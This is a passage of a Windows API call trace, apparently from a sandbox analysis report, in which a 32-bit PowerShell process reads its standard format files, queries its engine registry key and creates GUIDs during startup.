lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0050.112] GetLastError () returned 0xcb [0050.112] SetErrorMode (uMode=0x1) returned 0x1 [0050.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x19e688 | out: lpFileInformation=0x19e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0050.113] GetLastError () returned 0xcb [0050.113] SetErrorMode (uMode=0x1) returned 0x1 [0050.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.113] GetLastError () returned 0xcb [0050.113] SetErrorMode (uMode=0x1) returned 0x1 [0050.113] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x19e688 | out: lpFileInformation=0x19e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0050.113] GetLastError () returned 0xcb [0050.114] SetErrorMode (uMode=0x1) returned 0x1 [0050.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.114] GetLastError () returned 0xcb [0050.114] SetErrorMode (uMode=0x1) returned 0x1 [0050.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x19e688 | out: lpFileInformation=0x19e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0050.114] GetLastError () returned 0xcb [0050.114] SetErrorMode (uMode=0x1) returned 0x1 [0050.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0050.114] GetLastError () returned 0xcb [0050.114] SetErrorMode (uMode=0x1) returned 0x1 [0050.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x19e688 | out: lpFileInformation=0x19e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0050.114] GetLastError () returned 0xcb [0050.114] SetErrorMode (uMode=0x1) returned 0x1 [0050.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0050.114] GetLastError () returned 0xcb [0050.114] SetErrorMode (uMode=0x1) returned 0x1 [0050.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x19e688 | out: lpFileInformation=0x19e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0050.115] GetLastError () returned 0xcb [0050.115] SetErrorMode (uMode=0x1) returned 0x1 [0050.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0050.115] GetLastError () returned 0xcb [0050.115] SetErrorMode (uMode=0x1) returned 0x1 [0050.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x19e688 | out: lpFileInformation=0x19e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0050.115] GetLastError () returned 0xcb [0050.115] SetErrorMode (uMode=0x1) returned 0x1 [0050.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0050.115] GetLastError () returned 0xcb [0050.115] SetErrorMode (uMode=0x1) returned 0x1 [0050.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x19e688 | out: lpFileInformation=0x19e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0050.123] GetLastError () returned 0xcb [0050.123] SetErrorMode (uMode=0x1) returned 0x1 [0050.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0050.124] GetLastError () returned 0xcb [0050.124] SetErrorMode (uMode=0x1) returned 0x1 [0050.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x19e688 | out: lpFileInformation=0x19e688*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0050.124] GetLastError () returned 0xcb [0050.124] SetErrorMode (uMode=0x1) returned 0x1 [0050.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.126] GetLastError () returned 0xcb [0050.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.135] GetLastError () returned 0xcb [0050.136] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.136] GetLastError () returned 0xcb [0050.140] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.140] GetLastError () returned 0xcb [0050.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x19df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.141] GetLastError () returned 0xcb [0050.141] SetErrorMode (uMode=0x1) returned 0x1 [0050.141] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0050.141] GetLastError () returned 0x0 [0050.141] GetFileType (hFile=0x328) returned 0x1 [0050.141] SetErrorMode (uMode=0x1) returned 0x1 [0050.141] GetFileType (hFile=0x328) returned 0x1 [0050.141] ReadFile (in: hFile=0x328, lpBuffer=0x2e9e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2e9e5c4*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.143] GetLastError () returned 0x0 [0050.145] ReadFile (in: hFile=0x328, lpBuffer=0x2e9e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2e9e5c4*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.145] GetLastError () returned 0x0 [0050.145] ReadFile (in: hFile=0x328, lpBuffer=0x2e9e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2e9e5c4*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.145] GetLastError () returned 0x0 [0050.145] ReadFile (in: hFile=0x328, lpBuffer=0x2e9e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2e9e5c4*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.145] GetLastError () returned 0x0 [0050.146] ReadFile (in: hFile=0x328, lpBuffer=0x2e9e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2e9e5c4*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.146] GetLastError () returned 0x0 [0050.146] ReadFile (in: hFile=0x328, lpBuffer=0x2e9e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2e9e5c4*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.146] GetLastError () returned 0x0 [0050.146] ReadFile (in: hFile=0x328, lpBuffer=0x2e9e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2e9e5c4*, lpNumberOfBytesRead=0x19e504*=0x9e2, lpOverlapped=0x0) returned 1 [0050.146] GetLastError () returned 0x0 [0050.146] ReadFile (in: hFile=0x328, lpBuffer=0x2e9db46, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2e9db46*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.146] GetLastError () returned 0x0 [0050.146] ReadFile (in: hFile=0x328, lpBuffer=0x2e9e5c4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2e9e5c4*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.146] GetLastError () returned 0x0 [0050.146] CloseHandle (hObject=0x328) returned 1 [0050.146] GetLastError () returned 0x0 [0050.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.147] GetLastError () returned 0x0 [0050.147] SetErrorMode (uMode=0x1) returned 0x1 [0050.147] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2eaf680 | out: lpFileInformation=0x2eaf680*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0050.147] GetLastError () returned 0x0 [0050.147] SetErrorMode (uMode=0x1) returned 0x1 [0050.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.147] GetLastError () returned 0x0 [0050.147] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e488 | out: phkResult=0x19e488*=0x328) returned 0x0 [0050.147] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x0, lpcbData=0x19e4cc*=0x0 | out: lpType=0x19e4d0*=0x1, lpData=0x0, lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.147] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x247300, lpcbData=0x19e4cc*=0x56 | out: lpType=0x19e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.148] RegCloseKey (hKey=0x328) returned 0x0 [0050.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.148] GetLastError () returned 0x0 [0050.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x19dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.148] GetLastError () returned 0x0 [0050.169] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x96da4442, Data2=0x5038, Data3=0x4ab7, Data4=([0]=0x9e, [1]=0xc0, [2]=0x91, [3]=0x79, [4]=0xf5, [5]=0x41, [6]=0x33, [7]=0xf))) returned 0x0 [0050.187] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xb9fb0a9, Data2=0x5867, Data3=0x4109, Data4=([0]=0x8b, [1]=0x46, [2]=0x63, [3]=0xa5, [4]=0x60, [5]=0xc9, [6]=0x21, [7]=0x24))) returned 0x0 [0050.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0050.188] GetLastError () returned 0x0 [0050.188] SetErrorMode (uMode=0x1) returned 0x1 [0050.188] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0050.188] GetLastError () returned 0x0 [0050.188] GetFileType (hFile=0x328) returned 0x1 [0050.188] SetErrorMode (uMode=0x1) returned 0x1 [0050.188] GetFileType (hFile=0x328) returned 0x1 [0050.189] ReadFile (in: hFile=0x328, lpBuffer=0x2ec2968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2ec2968*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.190] GetLastError () returned 0x0 [0050.191] ReadFile (in: hFile=0x328, lpBuffer=0x2ec2968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2ec2968*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.191] GetLastError () returned 0x0 [0050.191] ReadFile (in: hFile=0x328, lpBuffer=0x2ec2968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2ec2968*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.191] GetLastError () returned 0x0 [0050.192] ReadFile (in: hFile=0x328, lpBuffer=0x2ec2968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2ec2968*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.192] GetLastError () returned 0x0 [0050.192] ReadFile (in: hFile=0x328, lpBuffer=0x2ec2968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2ec2968*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.192] GetLastError () returned 0x0 [0050.193] ReadFile (in: hFile=0x328, lpBuffer=0x2ec2968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2ec2968*, lpNumberOfBytesRead=0x19e504*=0xfb2, lpOverlapped=0x0) returned 1 [0050.193] GetLastError () returned 0x0 [0050.193] ReadFile (in: hFile=0x328, lpBuffer=0x2ec20ba, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2ec20ba*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.193] GetLastError () returned 0x0 [0050.193] ReadFile (in: hFile=0x328, lpBuffer=0x2ec2968, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2ec2968*, lpNumberOfBytesRead=0x19e504*=0x0, lpOverlapped=0x0) returned 1 [0050.193] GetLastError () returned 0x0 [0050.194] CloseHandle (hObject=0x328) returned 1 [0050.194] GetLastError () returned 0x0 [0050.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e064, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0050.194] GetLastError () returned 0x0 [0050.194] SetErrorMode (uMode=0x1) returned 0x1 [0050.194] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee31f8 | out: lpFileInformation=0x2ee31f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0050.194] GetLastError () returned 0x0 [0050.194] SetErrorMode (uMode=0x1) returned 0x1 [0050.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0050.194] GetLastError () returned 0x0 [0050.194] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e488 | out: phkResult=0x19e488*=0x328) returned 0x0 [0050.194] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x0, lpcbData=0x19e4cc*=0x0 | out: lpType=0x19e4d0*=0x1, lpData=0x0, lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.194] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x19e4d0, lpData=0x247300, lpcbData=0x19e4cc*=0x56 | out: lpType=0x19e4d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x19e4cc*=0x56) returned 0x0 [0050.195] RegCloseKey (hKey=0x328) returned 0x0 [0050.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0050.195] GetLastError () returned 0x0 [0050.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19dfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0050.195] GetLastError () returned 0x0 [0050.196] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xf26c2e43, Data2=0xf137, Data3=0x45ce, Data4=([0]=0x80, [1]=0x62, [2]=0xd3, [3]=0xca, [4]=0xfc, [5]=0x1d, [6]=0xbf, [7]=0x40))) returned 0x0 [0050.203] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xe257f3b2, Data2=0xef51, Data3=0x4682, Data4=([0]=0xb5, [1]=0x41, [2]=0xbd, [3]=0x8b, [4]=0x98, [5]=0xab, [6]=0xc7, [7]=0x91))) returned 0x0 [0050.206] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x1bc2a0c0, Data2=0xfc65, Data3=0x4d0d, Data4=([0]=0x83, [1]=0x3e, [2]=0xab, [3]=0xe4, [4]=0x49, [5]=0x31, [6]=0xc9, [7]=0xd7))) returned 0x0 [0050.207] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xa6de355, Data2=0xaa6b, Data3=0x4e6d, Data4=([0]=0x89, [1]=0x1a, [2]=0xd7, [3]=0x19, [4]=0x90, [5]=0xf0, [6]=0xe9, [7]=0x8d))) returned 0x0 [0050.207] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0xde9d7e6, Data2=0xa34c, Data3=0x4748, Data4=([0]=0xaa, [1]=0x39, [2]=0x87, [3]=0x99, [4]=0x46, [5]=0x64, [6]=0x78, [7]=0x3a))) returned 0x0 [0050.207] CoCreateGuid (in: pguid=0x19e4f8 | out: pguid=0x19e4f8*(Data1=0x65727322, Data2=0xe3d1, Data3=0x4649, Data4=([0]=0xb4, [1]=0xb9, [2]=0xcd, [3]=0x93, [4]=0x9a, [5]=0x49, [6]=0xdd, [7]=0xc5))) returned 0x0 [0050.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x19df9c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0050.207] GetLastError () returned 0x0 [0050.207] SetErrorMode (uMode=0x1) returned 0x1 [0050.207] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0050.207] GetLastError () returned 0x0 [0050.207] GetFileType (hFile=0x328) returned 0x1 [0050.207] SetErrorMode (uMode=0x1) returned 0x1 [0050.207] GetFileType (hFile=0x328) returned 0x1 [0050.208] ReadFile (in: hFile=0x328, lpBuffer=0x2f02ba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19e504, lpOverlapped=0x0 | out: lpBuffer=0x2f02ba0*, lpNumberOfBytesRead=0x19e504*=0x1000, lpOverlapped=0x0) returned 1 [0050.209] GetLastError () returned 0x0 